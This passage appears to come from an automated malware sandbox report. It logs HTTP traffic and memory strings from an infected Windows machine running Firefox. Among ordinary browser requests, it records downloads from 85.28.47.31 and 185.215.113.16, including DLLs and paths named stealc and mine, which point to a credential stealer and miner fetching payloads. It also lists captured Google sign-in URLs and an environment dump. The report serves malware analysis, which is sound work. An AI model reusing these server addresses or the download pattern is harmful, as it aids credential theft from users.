Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/e93e520a-00b4-412f-b6c9-5558d2fce1c6 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/61cebe57-eeee-464e-9b2c-ac2e19541b6b HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/bf20afe9-a58a-41e9-8cac-041eef83a1b3 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/8bc91d67-1d3d-4cd1-89f0-094c92ed8df4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/894f51cb-fd5b-43cb-a050-43bd1fdc5ee6 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/b2e034e0-00ba-4630-9778-300fed6bde65 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/devtools-compatibility-browsers/changeset?_expected=1721884805468&_since=%221694439985514%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/7925cb6e-d44b-4094-a90f-28c0a426e872 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/b349a8f0-8f97-4587-92f0-a94aad66a9a4.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/a9a59e5d-077d-4df7-9757-dc9b0bf1ba19.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fimg.pastemagazine.com%2Fwp-content%2Fjuploads%2F2024%2F07%2Folympicbeds.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/1e666eb4-786d-4385-87e0-ba83ce528905.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/3eb97e9a-d15e-4467-bbd9-814e0a8aff0b.svg HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/c531d3ca-db81-4c48-83c3-8e9b586df0e2.jpg HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/translations-models/changeset?_expected=1721853459238&_since=%221692284142841%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/08c97d2d-b184-4f7c-8d26-38ec2e567a70.json HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbgmoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-imoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enmoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0YouTubemoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I77EVwBCWklE9qIBneDMIiwFWCCFTErG2FyxHopmLBm9ld0zmag6hfnN6yKuG81xlYfRS6YoZQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1379105066%3A1722017451321129&ddm=0moc.elgoog.stnuocca.( equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0 equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.youtube.com/accountmoc.ebutuoy.www. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +www.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +www.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +www.youtube.comwww.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +3www.youtube.comaccounts.google.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +Mwww.youtube.com\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3217482927.0000016DE07AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443 <ROUTE-via www.youtube.com:443> {NPN-TOKEN h3}^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3204782382.0000016DE9E4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program 
Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsq equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet 